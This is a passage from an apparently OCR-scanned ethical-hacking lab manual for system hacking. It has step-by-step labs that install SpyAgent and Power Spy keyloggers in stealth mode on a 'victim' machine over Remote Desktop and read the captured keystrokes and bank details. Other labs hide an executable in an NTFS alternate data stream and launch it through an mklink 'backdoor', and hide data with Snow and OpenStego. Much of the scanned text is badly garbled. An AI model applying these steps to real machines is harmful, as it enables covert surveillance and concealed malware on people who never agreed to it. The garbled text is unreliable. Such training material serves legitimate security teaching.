17, So, click Yes to continue. 


Белге reed he flowing License Agreement Press the PAGE DOWN key lo see he res! ol tre 
аселет 


[кете 


1. толгау une the proa on а sigle corper one time. You may rol copy the program and 
шону natsid енд| buc, purposes ose h suspan ol ing he pogar ona cde 


>. You ray on install this snare ona computer et you ои. or on a computer am wich you 


have consen st tre one о zal ihe sae 
T ——— 
L—X———— M 


Do you весе! al he terma che иседи License greener? If you choose Но. Бр өй lve To 
intl tae pee pous тыш accep ie адетин. 


| 


m—€— 
18. Choose Destination Location window appears, verify the directory ro install 
Spytech SpyAgent. 


19. Click Next to continue installation. 


За wit 5гме‹һ Spygate dome dien 


Е scam Mode ths Toista lo hie dreetoy, chek Nest. 

‘option clone SpyAgent to 

men in ot йв. Тона lo а diferent rectory, cick Browse and select another directo, 
Combined vh Acre 

Mode the ойе wil ‘You can choose net to instal Spylech Spyloent by choking Cancel to eit 
ad and тил in mentoring Sem 


ode in compie ct 


LET] 


JE CEH TOOLS(CEHVIGHODULE E ЗҮЗТЕМ HAT | Bronce. 


"Space ecured. 3340K 
Space Avalable. 22877248 K 


шеси 


FIGURO 14 cing ier Gestion 
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20, "The Select SpyAgent Installation Type window appears; select the 
Administrator/Tester sctup type. 


21, Click Next. 


Ckck he ype of Setup eu pedet then cic Hest 


Род wil be instaled wif tbe al scare 
(pena ard себе va dou аш пети. 


Theis төситетде а dia тен cen Hel 


Эзен жетише 
ШЇ pian wang: С Ststn italien Prog wl Ње ац wth rinsed 
тыз орой orto piam anv tes etn rons 
ЕТТИН reru Aes HEL! Doses e NOT 
Seria ppc мш 
аы, Th merge an 
Кашына ше 
p 
ша Seen dor: 
Spscs Reged: 390K 
Space volte. 22575700K 
Torr 
OUR 915: sig tain Туре 
22, ‘The Ready to Install window appears; click Next to start installing Spytech 
SpyAgent. 
Shp naw han ancug M——— Spot 
(ek Back to make any changes before continuing Chk Cancel өй 
E 
ED gcns 


Awe son o pei where 
Fou vant Spy gent oso 
EN 
ЕЯ 
иши poing ALL 
eif recommend 

ko De айо be se 
озуда 
iile 


FIGUR 83 Realy asa viden 
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23, The Spytoch SpyAgent Setup шор Бох prompts jou to indude an 
uninstaller, click Yes. 


Ө аа 


FIGURE9.17 Seeing an unnsaler 


24. А Spytech SpyAgent window appears; close the window. 


+ [De Wines Seren» бөйөн» › gm 6] 


* [em эней ун 
pd 
revient 
temi Ha eror 
Гонти 
pp 
[aum 


FIGURE 918 Spec SpyAjeat widow 
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25, ТЬе A NOTICE FOR ANTIVIRUS USERS window appears; scad the notice, 
and click Next, 


der arvis rogas can detect vite тале cl plea 
angers programe Trie nomnal aes а Seyon пала лге: 
[nd коти and cen юмде: haute es, ich barca) maa 

hat you сал oet alt and натр» hen an arius program "hnic 
Pt coud te” sarating 


"нае а од o captures keytiokes 

Tiota that menare ов at Ё 
Solar that slows you to recover passord а oher personal dala 
тте that mentors о logs remet cr elu acy 


се Spráger can do al ofthe above, same aus ан may 
бел spent as polerbaly har cı а won deste Abena 2 
leptnate too 1o morator you cage (ard users) WN a Spach 
ctr, vou zan be зше сш product are 100% ed to ueo ard 


FIGURE 9119: A Notice For Anon Users window 


26. "The Finished window appears; uncheck View Help Documentation, and 
dick Close to cad the setup. 


Setpis conces and Spytoch руй то tect 


ЕЁ пардон 


kk Closet ond he Seng 


FIGURE 920 Fide window 
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27. The Spytech SpyAgent dialog box appears; dick Continue... 


spytech 


SpyAgent 


Computer Monitoring and Activity Recording Sofware 


ee 


ee 


FIGURE al: pie Spy Ner dilag box 
28. Step 1 of setup wizard appears; click click to continue... 


y: SpyAgent 


first time usage tips and help 


Welcome to SpyAgent! (Step 1) 


Before you can start using SpyAgent you must 


configure your password that will be used for 
accessing SpyAgent. Do not lose this 
password as it cannot be reset without a 
reinstallation of SpyAgent. 


Ш secte 
Eurer 
MR. 


| en 


TIGURE D22 Sep обрані 


29, Enter a password in the New Password Gold, and retype the same password 
in the Confirm field. 
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Note: Here, the password entered is qwerty@123 
30. Gick ok. 


FIGURE 9.25. Seeing New Password 
31, The password changed pop-up appears; click OK 


By, реони cara 


FIGURE 924: pasword changed popup 
32. Step 2 of Welcome wizard appears, click click to continue... 


Welcome to SpyAgent! (Step 2) 


You will now be presented with the Easy 


Configuration Wizard. You can use this wizard 
to quickly setup SpyAgent's most frequently 
used features. You can restart this wizard at 
any time in the future. 


FIGURE. 925: Siep 2 of less wand 
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33, "The Configuration section of setup wizard appears; dick the Complete + 
Stealth Configuration radio button, and click Next. 


FIGURE 9.26 Cin eon 
34, The Extras section of setup wizard appears check Load on Windows Startup 


option, and click Next. 


FIGURE 927 Eira secion 
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35. The Confirm Settings section of setup wizard appears; dick Next to 


FIGURE SAK Confiem seine section 


36. The Apply section of senp wizard appears; click Next. 


T 


FIGURE 929: Apply ection 
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37. The Finished window appears; click Finish to successfully setup SpyAgent. 


= ч 
ЅруАдепі_ амни 


Configuration | Configuration Finished! 


[e 2. xe 

l. Estras Yeu have now succassfilly setup SpvAgant! Ifyou 
sted fat tals | Mish 1a change any зифа further click om te 
побрза ө, з. Confirm Settings | umans on he SoyAgere trace ker more 
Faccia dei 2 


porem 4. Apply 


шш Беа) 


FIGURE 230 Conon Pid 
38. The main window of SpyAgent appears, along with Step 3 of setup wizard. 
39. Click Спек to continue... 

э} SpyAgent 


ООШ RETE a 
si gt lai 7 уЗ SpyAgent 
аа асаа 


ЕКЕТ 


puce a семи Fl 


Жашсын pre 
‘Sami feo le 
очна eo sac 
ironia 
ela ctas. 


FIGURE 9.51: Maa window of Spy 
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40, Ifa Getting Started dialog-box appears, click No. 
41, To track the general user activities, click Start Monitoring, 


oO “тт 


FIGURE D32 Sun meninting 
42. The Enter Access Password window appears enter the password you 
specified in stop 31 (in this lab, qwertya123), and click OK. 


Enter Access Password 


mmn] 


FIGURE 933 Fring the paso 
43, The Stealth Notice window appears; read the instructions, and click OK. 
Note: To bring SpyAgent out of stealth mode, press CtritSnite+att+m. 


is you fit ime mowing Sgen n slenih mode emere 
жлне сырынан s med 
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“А SpyAgent pop-up appears. Check Do not show this Help Tip again and 
Do not show Related Help Tips like this again; click click to continue... 


SpyAgent 


first time usage tips and help 


ED зул fees SpyAgent is no longer monitoring your 
[к= ынет льш computer. To restart monitoring press the 
dolos youto se anl “Start Monitoring” button again, then enter 
eps bg des for buer your password. To view logs now, click on the 


eric rumen and appropriate log viewer. 
rtis pene 

Emad in HING, oemat 
Er бор sth you web 
[е 


Do wot shaw this Halp Tip again 


(Beet до Rated id Tie lle a өши 
ыы EK ta continues. per 


FIGURE 925 Star mening 
45. Close the Remote Desktop Connection. 
RitasK з 46, Now Log onto the Windows Server 2012 virtual machine’s, Jason account 
Fae seen аз а legitimate user (assume you ate acting as а victim). 
and Perform User 47. Browse the Interact (anything), or perform any user activity. 


Get more out of Zimbra 


gaan ar tr ha nant cepa an ө.‏ ت 


имез rei loging see ot zie gano tu den aL aed sie 


FIGURE 9%: Perform Uer Acie 
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48. Now, switch back to the host machine, and perform steps 1-8 to launch 
Remote Desktop Connection, (you are logging into the machine as an 


FICURES-: Баъ Ramowe Dep cancion 

49. To bring SpyAgent out of stealth mode, press GtrieShifteAIteM. 

50. Spyagent will ask for an Access Password (qwerty@123); enter it and click 
ок. 


Enter Access Password 


FIGURE 36 Ferg the passend 
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51. To check user keystrokes from keyboard, click Keyboard & Mouse on 
the SpyAgent GUI. 


52. Select View Keystrokes Log. 


ES mee |а| 
a 


FIGURE 939 Sceerg View Keptakes ag 


53. A list of keystrokes log entries is displayed. Sclect an application whose 
log entries you want to view. Here, bank account details have been 
viewed 


‘Note: Ifa User Account Control pop-up appears asking you to disable the 
UAC, click Yes. 


54. SpyAgent displays all the resultant keystrokes for the selected application, 
as shown in screenshot: 


gent Keys Log Weer тина) 


FIGURE 940; Rested eren 
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55. То check the websites visited by the user, click Website Usage. 
56. Select View Websites Logged. 


1 SpyAgent 


me 


te 


FIGURE 941 Selecting Vies Webskes Logs! 


57. SpyAgent displays all the user-visited website results, as shown in the 
screenshot: 


pyAgent Websites Log Viewer - 3 entries 


Sven eset E een 


FIGURE 42 Reul o sel weer 
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58. In the same way, you can select each tile to view all the activities, 
59. Once you are finished, Close the remote desktop connection, 


60. This way, even an attacker can hack into a machine and install SpyAgent 
to spy оп all activities performed by а user on his/her system. 


Lab Analysis 
Analyze and document the results related to this lab exercise. Provide your opinion 
seganding your targe’s security posture and exposure. 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 
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Web Activity Monitoring and 
Recording using Power Spy 

Power Spy software alles you to secretly monitor and record all activities on your. 
computer, wbich is completely legal 

Lab Scenario 

New technologies allow employers to check whether employees are wasting time at 
recreational Web sites or sending unprofessional emails, At the same time, 
‘organizations should be aware of local laws so that their legitimate business interests 


Чо not become an unacceptable invasion of worker privacy. Before deploying an 


employee monitoring program, you should clarify the terms of acceptable and 
unacceptable use of corporate resources during work hours, and develop а 
comprehensive acceptable use policy (AUP) that staff must agree to. 


In this lab, we explain about monitoring employee activities using Power Spy. 


Lab Objectives 
‘The objective of this lab is to help students use the Activity Monitor tool. After 
completing this lab, students will be able to: 


= Install and configure Power Spy 
= Monitor keystrokes typed, websites visited, and Internet Traffic Data 


Lab Environment 
"To perform the lab, you need: 
"А computer running Windows Server 2016 
+ A computer running, Windows Server 2012 virtual machine (victim 
machine) 
= You can download the Power Spy tool from. 
étpiwww.omatrixsoft.com/download.php7p=pawer-spy-software 
= Ifyou wish to download the latest version, screenshots may differ 
= Administrative privileges to install and run tools 
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Lab Duration 
‘Time: 15 Minutes 
Overview of the Lab 


E ышына This hb demonstrates to students how to establish remote des 
пепла ештен a victim machine and run Power Spy to secretly track user ac 


наа Î. This lab works only if the target machine is turned ON. 
ee ere 2. Аз you have seen how to escalate privileges in the earlier lab (Escalating 
у Privileges by Exploiting Client Side Vulnerabilities), you will use the same 


technique to escalate privileges and then dump the password hashes. 


3. On obtaining the hashes, you will use password cracking application such as 
RainbowCrack to obtain plain text passwords, 


4. Once you have the passwords handy, you will establish a Remote Desktop 
Connection as an attacker; install Power Spy, and leave it in stealth modo. 

Note: In this lab, you are connecting remotely to a Windows server 2012 virtual 

machine. You can establish remote connection only for a user account granted 

administrative privileges (here, Jason has administrative privileges). 

5. The next task will be to log onto the virtual machine as a legitimate user (in 
this case, you) and perform user activities without being aware of the 
application tracking your activities 

6. Having done so, you will again establish а Remote Desktop Connection a5 
an attacker, bring the application out of stealth mode, and monitor the 
activities performed on the virtual machine by the vietim (you). 


Lab Tasks 


1. In the Windows Server 2016 machine, dick the Search icon in the taskbar to 
open the search ment 


"GUB 01 Sekei Sesh 
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2. Неге, search for Remote Desktop Connection. 
3. Click Remote Desktop Connection in the Search field. 


FIGURE 102:Scorhig for Roe Daan Conca 

4, The Remote Desktop Connection window appears; enter the IP address of 
Windows Server 2012 (in this lab, 10.10.10.12, which might differ in your 
lab environment) in the Computer field, and click Show Options. 


€ Remote Desktop Connection - x 


Remote Desktop 
»% Connection 


- 
e ONERE 
за AC ANN 


Em o 


FIGURE LOS вонанд Disp бишей 
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== E 


You sd be asked for resets when you connect. 
Dhow mato save cadre 


Connection sete 
“Sava tha curet cenrecton seng to an RDP fie or open a 
poe 


FIGURE ая fh Rate Dasa Conan 
6. The host machine tries to establish а Remote connection with the target 
machine. 
7. Å Windows Security pop-up appears cater the password (qwerty) and click 
ок. 
[crecer 
Enter your credentials. 


These credentials wili be used to connect to 10107012. 


o- 


FIGURE 105: Winden Say горар 
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8. A Remote Desktop Connection window appears; click Yes. 


заттан олом cold ret be утес dua to orablare 2 
many cote V roy ta eate o pectet 


po 


Lg) Name the cat fom the rete conde 
WON OUAGTOWEFAICEM com. 


ones era 
Tra чена ero vers encour whl valdag he ene 
muet comes 


A Tre cenfente rotten a tuted cething этол. 


Da уол wart 1o connect ear ae cto ran? 


Гоин эж ле sgan fr camezienate mis сотре 


жеш ca 
T 


Note: You cannot access a Remote Desktop Connection if the target machine 
is shut down. Thr is passible only jf the machine и in tured on. 


9. A Remote Desktop connection is successfully established, as shown in the 
screenshot 


FIGURE 107 kamote Пар Co nettan ела Ый eel 
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10. Close the Server Manager window. 
11, Navigate to ZACEH-ToolsiCEHv10 Module 06 System. 
G raska ‘Hacking\Spyware\Genoral Spyware\Powor Spy. 
Install Power Spy 12, Double-dick setup.exe. 
s 13. IF the Open File - Security Warning pop-up appears, click Run. 
14, Follow the installation steps to install Power Spy. 


15, On completing the installation, the Rum as Administrator window appears; 
dick Run. 


FIGURE 108 Hans aint indo 


Destine 16. The Setup Login Password window appears; enter the password 
какайта Геке дибер (qwerty@123) in the New password and Confirm password fields. 
Saletan ter 

tavak Stvesceenshowas 17. Click Submit, 

omui eye 


ope ierit 
d 
‘went ce 


FIGURE 109: Setap loge pasword window 
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18. The Welcome To Power Spy Control Panel! webpage appears in the 
default browser. Close the browser. 


Welcome To Power Spy Control Panel! 


E esas Tped— 
bga cytes, indtaling 
оош вов panned 
Таз итке ин the ne, 
WModorsecmanr, 
эрй ше, ad 
p 
Get Started in 4 Easy Steps 
FIGURE 1010 педале To Poser Spr Сопко! Panel Webpage 
19. If the Microsoft Phishing Filter pop-up appears, sclect Ask me later and 
click ок. 
Microsolt Phishing Filter 
M Help make your browser mo 
Set up Phishing Fiter 
Phishing Fiter ie designe to warn you the website you are vet might be 
moersoneing әләге терәге. Nhat a Pnahng Fiter” 
(@ © Tum on automatic Phishing Filter (recommended) 
Some vesse adresses wi be sent io MC O60 to be eded, Information 
Termes sil nat be usec to personaly депе You. 
М8 С Turn off automatic Phishing Filter 
reste adresses d not be sent o sf nes you done to check: 
FIGURE 10.11: Misc Pking ee popup 
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20, The Information dialog box appears on the Setup login password 
window; dick ОК. 


p login ра @ 


FIGURE 112: fermion dig uo 


21. The Enter login password window appears; enter the password (which 


EB sat scons went 
p 
errem De torto 
rever. 


FIGURE 1013: Enter og Parvo win 
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23. The Register product window appears; click on Later to continue. 


ster product [1] 


EH sean stone Poser 


arame youll Clk Start mentoring эп Stealth Mos 


иш Wak sora hen dating seu FC ising web мез racing eaa chati 
p : “к. Then, ле уси ийеу to Unk —— 
тагы. Ko coe wl kare 
титулун кт 
ese бын анд: You can abt ck Config etna setup ner to гоже logs hom ary 


rule Power Sy ao 


‘sain 


1 you the родо, dick Purchase button below ta buy ad reir Stealth Mode wl be 
enabled этеги u flected wth Your regen я 


لا 
Е]‏ 


FIGURE 101 Reger prac sino 


24. "The main window of Power Spy opens as shown below. 


ВА тазе You 
anx seg andende 
ine iradate 
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FIGURE 10.15: Main window of Power Spy 
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25. Click on Start Monitoring. 


ED tap edic 
perdi 
Vin diee icd мр 
at alo sah oor 
coun зу кула, 
Жш без. 


FIGURE 1016: srt monton 

26, If the System Reboot Recommended window appears, click OK. 

27, Click on Stealth Mode (stealth mode runs the Power spy completely 
invisibly on the computes). 


28, The Hotkey reminder dizlog-box appears; click on OK (to unhide the 
Power spy, Use Gtrl#Altex keys together on your PC keyboard). 


Hotkey rem 


Delete all lags 


FIGURE 1037: Haley анде dido bus 
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29. The Confirm dialog-hox appears; click Yes. 


EDI sey use Interface: 
song Pores Spy wi 
‘het Wiad tr common. 
таит 
ims ин стад 
fend grea рака 
dise y Rr 
paie 


Comfirm 


Export all lo 


FIGURE 1018: Conf dsp 


30. Close the Remote Desktop Connection. 


rem 31. Log on to the Windows Server 2012 virtual machine's Jason account as 
meme a legitimate user (here, assume you are acting as a victim) 
Activities. 32. Browse the Internet (anything) or perform any user activity. In this lab, 
Facebook and LinkedIn websites have been browsed. 
33. Once you have performed some user activities, follow stepst-8 to launch 
Remote Desktop Connection, (jou arc logging in as an attacker). 
34. To bring Power Spy out of stealth mode, press Ctrlealtex, 
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35. "The Run as administrator window appears; click on Run. 


Run as administrator 


[FIGURE 1015: Run alesis inde 


36. ‘The Enter login password window appears; enter the password (which 
you set in step 16) 


37. Click Submit. 


FIGURE 1020 Taser e pasen 
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38. Click Later in the Register product window to continue. 


и 


contol рәте ten do агу s мата web sits, reading emails, hatte 
оп facebook or Skype ек. Then use 


played on Desktop to disable Stealth Mode in tral version, 


You can totally vy the software on youre. Click Start monitoring and Stealth Mode on i's 


You can эво cick Configuration to change settings. setup an oma toon кле 
location such as 2 remote PC, Ра or smart phone: 


you like the product ciek Purchase button below o buy and register it. Stealth Mode wil be 


en rn шиж 


FIGURE 1021: Cit on Later 


Brasu s 39. Click on Stop Monitoring to stop the monitoring, 
View all the 
Recorded 
Activities 
ү 
loc 
тигип, 1022 Stap the тойо, 
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40. То check user keystrokes from keyboard, click on Keylogger from Power 
Spy Control Panel, 


ГД Progam tice 
Il pegs nag 
Кес à 
рр 
тика ит ит 
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ime de a. 


Export all log all log: 


FIGURE 10.2% Slecing tess from Poser spy control parci 


41, It vill display all the resultant keystrokes, as shown in the screenshot 


= Se 


FIGURE 1024 Reed eye 
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42. "To check the websites visited by the uscr, click on website visited from 
Power spy control panel, 


43. It will show all the usorvisitod websites’ results, as shown in the 


Ш Баа p — 
рата ИЕТ 
гесе 
гац 


FIGURE 1025: Rout of vt ей 


44, This way, an attacker might attempt to install key loggers and thereby gain 
information related to the user logged in websites, keystrokes, and so on. 


Lab Analysis 
“Analyze and document the results related to the lab exercise. Provide your opinion. 
regarding your target’s security posture and exposure. 


PLEASE TALE TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB 


Intemet Connection Required 


| Dyes Z No 
| Platform Supported 
[| EI Classroom. Ипа 


CEH Lab Maral Pagi STS ‘ica! Hacking көй Coonvenneasvnes Copy © by Baume 
AL Ris Reeve Reproducton & iiy Profi 


Module 06- System Hacking 


Hiding Files using NTFS Streams 


A stream consists of data associated with а main fik or directory (known as the main 
unnamed stream). Fach fle and directory in NTFS can have multiple data streams 


that are generally hidden from the user. 
icon kev Lab Scenario 
£7 Valuable Once the hacker has fully hacked the local system, installed their backdoors and 


information 


port redirectors, and obtained all the information available to them, they will 
proceed to hack other systems on the network. Most often, there are matching 
service, administrator, or support accounts residing on each system that make it 
Ш Меселе casy for the attacker to compromise each system in a short amount of time, Аз 
cach new system is hacked, the attacker performs steps to gather additional 
system and password information, Attackers continue to leverage information on 
cach system until they identify passwords for accounts that reside on highly prized 
systems including payroll, root domain controllers, and Web servers. To be an 
expert ethical hacker and penetration tester, you must undetstand how to hide 
files using NTFS streams. 


ВА Workbook review 


Lab Objectives 
‘The objective of this lab is to help students learn how to hide files using NTFS 
streams. 
Tools It will teach you how to: 
demonstrated in 
this lab aro $ 
available in А 
ZACEH- 
ToolsiCEHv10 " 
[жети-он Lab Environment 
Hacking To carry out the lab you need: 
= Windows Server 2016 running as a vital machine 
= NTFS Formatted СА drive 
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Lab Duration 

Time: 10 Minutes. 

Overview of NTFS Streams 
E мие 


Тозо estem s NTFS supersedes the FAT file system as the preferred file system for Microsoft 
завіи femeni Windows operating systems, NTFS has several improvements over FAT and HPFS 


Жыш 
(High Performance File System), such as improved support for metadata and the use 
of advanced data structures. 

Lab Tasks 
Г. ЖЕРТ 1. Run this lab in Windows Server 2016 virtual machine. 
arse 2. Make sure the СА drive file system is of NTFS format. To check this, go 
joda vaina ло Computer, right click Са, and click Properties. 
зык B заь 
wu. S7 
фе Qm E 
et "— 
aa 7x 
Pm 
FIGURE VL Cay бе rcf Wea Sener OI 
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3, The Local Disk (Cx) Properties window appears; check for file system 
format, and click OK. 


A. Local Disk (C) Properties x 


Shadow Copes Previous Versions Quas 
биен Toda Hardware Shag Securty 


Ml Used ace,  40309346304bytes 37568 


В Free space: 2:333537408b4es — 196GB 
Capacity: 42423283712byes 39568 
Divec: | Dk Gema 


(Compress thie drve to save disk apace 


[ZI How fies on he ve to have cortera indexed n addton te 
fie repeti 


FIGURE T2 Wider CA rper. 
4. Open Windows Explorer, navigate to ©: drive, create a new folder and 


name it magic. Using Windows Explorer, copy caleexe from 
Ciwindowslsystom32 to Cimagic. 


" а — 


ET I1 ETT E 
diem کر‎ 
В Omens ¢ 
Erme > 
n 
p 
7 
FIGURE 113 Cop alc ewe 
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5. Launch the command prompt, and type ed Cmagic and press Enter. 
The command-prompt directory points to the C:\magic drive. Now type 
notepad readme.txt and press Enter. 


ف 


6, The readme.txt notepad appears; click the Yes button if prompted to 
create a new readme.txt fic 


НОЈЕ Пя Geiger ie 
7. Now type Hello World # in the notepad file. 
r 2 231 
lieri win 


FIGURE 1.619 fo vod in aden aq пе 


8. Click File, and click Save to save and close the readme.txt notepad file. 


r a 


= 


FIGURE TT Sare dhe enezat notad e. 
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9, Туре dir and press Enter. ‘This lists all the files present in the directory, 
along with the files’ sizes, Note the file size of readme.txt, 


FIGURE ПА Note ше of he aden He 


Г лынса 10. Now hide cale.exe inside the readme.txt by typing the following in the 
гатуе сагала тебе 


type слтадіс\саіс.ехе > c:imagicireadme.txticalc.exe 


‘Then press Enter. 


FIGURE 11 Согым prompt wth tiling ees command 


11. Туре dirin command promptand note the file size of readme.txt, which 
should not change. Navigate to the directory crimagic, and delete 


А calc.oxe. 
Microsoft's Windows i 
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= 12. Туре the following command in the command prompt: 


эе, mklink backdoor.exo roadme.txt:calc.oxo 
the Hidden 


"Then press enter, 
Application 


In the next line, type backdoor and press enter. The calculator program 
will be executed as shown in the following screenshot 


FIGURE 11.11: Command prompt ith exceed hidden eee 


13. In real-time, attackers may hide malicious files from being visible to the 
ED enean legitimate users by using NTFS streams and execute them whenever 
peers required. 


Lab Analysis 
Document all the results discovered during the lab, 


PLEASE TALK TO VOUR INSTRUCTOR IF YOU HAVE QUESTIO 
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Platform Supported 
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Hiding Data using White Space 
Steganography 


Sravis sad in тти messages i ASCII tod by append white to the end f nes Bau 
фав and йн ат gerer rat iste m bd aes, бе msgs efie iden from casual 
aries And f de nib турт ue] eg cab ead aon f itis del 


Lab Scenario 


Network steganography describes al the methods used for transmitting data over a 
network without it being detected. Several methods for hiding data in a network have 
been proposed, but the main drawback of most of them is that they do not offer a 
secondary layer of protection, If steganography is detected, the data is in plain text. 
Attackers use steganography to transfer sensitive information out of the target system 
undetected. To be an expert Ethical Hacker and Penetration Tester, you must have a 
sound knowledge of various steganography techniques. 
Lab Objectives 
‘The objective of this lab is to help students learn: 

+ Using Snow steganography to hide files and data 

+ Hiding files using spaces and tabs 


Lab Environment 
‘Yo carry out the lab, you need: 
+ Snow located at ZACEH-Tools\CEHv10 Module 06 System. 
Hacking\Steganography Tools\Whitespace Steganography Tools\Snow 
* Download the latest version of Snow at 
httpiiwww.darkside.comau/snow. 
"Ifyou wish to download the latest version, then screenshots shown in the lab 
might differ. 
= Run this tool on Windows Server 2016 
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Lab Duration 


Time: 5 Minutes 
Overview of Snow 


Snow exploits the steganographic nature of whitespace. Locating trailing whitespace 
in textislike finding a polar bear in a snow storm, it uses the ICE encryption algorithm, 
so the name is thematically consistent. 


Lab Task 


1. Navigate to — ZACEH-Tool\CEHV10 Module 06 System 
MackingStoganography  ToolsWhitospace Steganography Tools, 
Shife+right-click the Snow folder, and select Open command window here 
from the context menu, 

Open notepad, type Hello World! and press Enter; then long press hyphen to 
draw a line below it- 


3. Save the file as readme.txt in the folder where SNOW.EXE is located. 


тшш — 


FIGURE 21 Gmurtsofseanene 


А. Туре this command in the command shell: 
snow -G -m "My swiss bank account number is 45656684512263" -p 
"magic" readme.txt readme2.txt, 

(Here, magic is the password. You can type your desired password also. 
readme2.txt is the name of another file which will be created automatically 
in the same location.) 


FIGURE 122 Hiding Come fread he in eee Ве 
5, Now the data ("My Swiss bank account number is 45656684512263”) is 
hidden inside the readme2.txt file with the contents of readme.txt. 
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6. The contents of readme2.txt are readme.txt + My Swiss bank account 
number is 45656684512263, 


7. Now type snow -C -p "magic" readme2.txt, it will show the contents of 
readme.txt (magic is the password which was entered while hiding the data). 


HGUN 123: Renaing the halden daft 
8. To check the filein GUI, open the readme2.tet in notepad and go to Edit > 
Select all. You will sce the hidden data inside readmez.txt in form of spaces 
and tabs. 


© тєлє нө 


FIGURE 124 Comens oë rada eve wih ls оре 


Lab Analysis 


Analyze and document the results related to the kab exercise, 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 


О Yes E No | 
Platform Supported | 
Б] Classroom. паь | 
SE косы Hacking and Gounsomessres Copy © by I0 mel. 


FY Valuable 
information 


A тен your 
кома 


Ш удете 


ED workbook review 


Module 06 - System Hacking 


Image Steganography using 
OpenStego 


OpenStego is a steganography tol that bides data inside images, 


Lab Scenario 


"The terrorists know that so many different types of files can hold all sorts of hidden 
information, and tracking or finding these files can be an almost impossible task, So 
they use stenographic techniques to hide data, This allows them to retrieve messages 
from thdr home bases and send back updates without a hint of malicious activity 
being detected, 


"These messages can be placed in plain sight, and the servers that supply these files will 
never know it. Finding these messages is like finding the proverbial "needle" in the 
‘World Wide Web haystack. 


In order to be an expert ethical hacker and penetration tester, you must understand 
how to hide a text inside an image. In this lab we show how the text can be hidden. 
inside an image using OpenStego tool. 
Lab Objectives 
‘The objective of this lab is to Һар the students how to hide secret text messages in 
images using OpenStego. 
Lab Environment 
"To perform this lab, you need: 
* Windows 10 running as virtual machine 
* OpenStego located at ZACEH-ToolsiGEHV10 Module 06 System 
Hacking\ Steganography Tools\lmage Steganography Tools\Openstego 
= Administrative privileges to install and run tools 
"Or, download the OpenStego tool from 
http:/sourceforge-net/projects/openstego/files 
= Ifyou wish to download latest version screenshots muy differ 
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* Run this tool on the Windows 10 virtual machine 


Lab Duration 

"Time: 10 Minutes 

Overview of OpenStego 

OpenStego is Java-based application and supports password-based encryption of data 


for additional layer of security. Tt uses DES algorithm for data encryption, in 
conjunction with MD5 hashing to derive the DES key from the password provided, 


Lab Tasks 


Бласа 1. Launch the Windows 10 virtual machine and log in to the Admin user 
—— BÀ account. 


2. Navigate to ZACEH-ToolsICEHv10 Module 06 System 


Hacking\Steganography Toolsilmage Steganography 
Tools\OpenStego, and doublc-dick Setup-OpenStego-0.6.1.exe. 


Install OpenStego 


3. If the Open File- Security Waming pop-up appears, click Run. 
4. 16а User Account Control pop-up appears, click Yes. 


Üoeesurus 5, The OpenStego Setup wizard appears, click 1 Agree. 
Беретта 
im 


Please гелен the icense terms before astaling Openótego 


Press Page Doun to see the rest of the agreement. 


| GNU GENERAL PUBLIC LICENSE. 
Verson 2, line 1991 


Copyright (C) 1989, 1991 Free Software Foundation, Inc., 

51 Frankin Street, Fifth Floor, Boston, MA 02110-1301 USA 

Everyone is permitted to copy and deirbute verbatim copies 

of the icense document, but changng it's not alowed. 
Preamble 

| The censes for most software are designed to take away your 


If you accept the tems of the agreement, dick I Agree to continue, You must accept the 
agreement to install Openstego 


Cx e 


FIGURE (31: towalig Opetegn 
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6, In the next step of the wizard, click Install, 
Note: Ifthe setup asks for java installation, click Mo and proceed. 
pestego Sup 


Choose Install Location. 
Choese the folder in which to atl Opentago. 


Setup өй ista OperStego i the folowing fer To instal in a derent folder, бе rome. 
and select arother folder. Cic netl to start the netalson. 


FIGURE 132 Insting Ope 
7. On completing the installation, click Clese, 


FIGURE 134 Insulet Operi 
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8. Navigate to the Apps list in the Start menu, and click Run OpenStego 
icon to launch the application. 


B e 


FIGURE 134 Taunching Opens eps 


9. OpenStego main window appears, as shown in the screenshot: 


нё data Hares booking Пе 


FIGURE 135: Оран Main Wi 
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Gras 2 10. Click ellipsis, under the Message File section. 
Hide the Text. E *] 
Document Using 
puces ms nues ramis ting er 
F mm 
E i 0 
a eene 
ЕЕЕ 
HOURS (дерә Ban 
11. The Open - Select Message File window appears. Navigate to ZACEH- 
ТооыСЕНУ10 Modulo 06 System ^ Hacking\Steganography 
Toolsiimage Steganography Tools\OpenStego, зсіссі New Text 
Documenttxt, and click Open, The text file contains sensitive 
information such as VISA and pin numbers, 
Рр x 
J aem 
к=» 
Tare 
LIES toaren nt œ 
Nemo нее HE 3 E 
FIGURE 137 Opn Sos Menge Ww 
12. "The location of selected file appears in the Message Fi 
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FIGURE 198 Clegg Baton 
14. The Open - Select Cover File window appears, Navigate to ZACEH- 
Tools\C EHv10 Module 06 System Hacking\Steganography 
Toolsilmage Steganography ToolsiOpenStego, select Island.jpg, and 
click Open. 
14) Open - Select Cover File *] 
Lockie Operstego s 
@ 
Recent tens 
esas 
Dozens 
тырс 
Ca 
eet rcge [Cver fies (no, “of. "ea, “и “ona, ime) v EI 
FIGURE 130: Open Scc Cover Fe Window 
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15. Now, both the Message file and the Cover file arc uploaded. By 
performing steganography, the message file will be hidden in the image 
file. 


Ez * 
тс data Ramis cing Fes 
ogee sg ен 
[уетше ze 
dun ordinal ger шотшо c ї 
жы 
pte s 
ттүү 
16. Click ellipsis, under Output Stego File. 
ps = E: 
ne нар 
_ Tite dra amines boing те 
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Po нини не Seip en Se 
* nere 
и Em лине ott dm ee emp 
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17. The Save- Select Output Stego File window appears. Choose a location. 
where you want to save the file. In this lab, the location chosen is 
the Desktop. 


ТА Save - Select Output Stego File 


[Dropbox 


Qa Roo 


мїм & Ain 
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Ties 
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18, Provide the file name stego and click Open 


FIGURE 155 Providing Не Name 
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19. Now, click Hide Data. 


нае data harmless looking ies 
eae Ылан ано rate мше" с ried sene nemaye n nuke al 
е теа 


[uet a 


FIGURE 13 14: Cid Hide Des botton 


20. A Success pop-up appears, stating that the message has been successfully 
hidden. Click OK. 


Success x 


Ө ==.» 1 cover riet sped oe 


FIGURE 15 Sce pop 


Ытлан э 21. Minimize the OpenStego window. The image containing the secret 
TUR E message appears on the Desktop. Double-click the image to view it. 
View the Imago 
Containing Hidden 
Text 


Note: It can take the image file some time to open 


FIGURE 1316 mage Containing the Set Mesue. 
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22, You will see only the image but not the contents of the message (text file) 
embedded in it, as shown in the screenshot: 


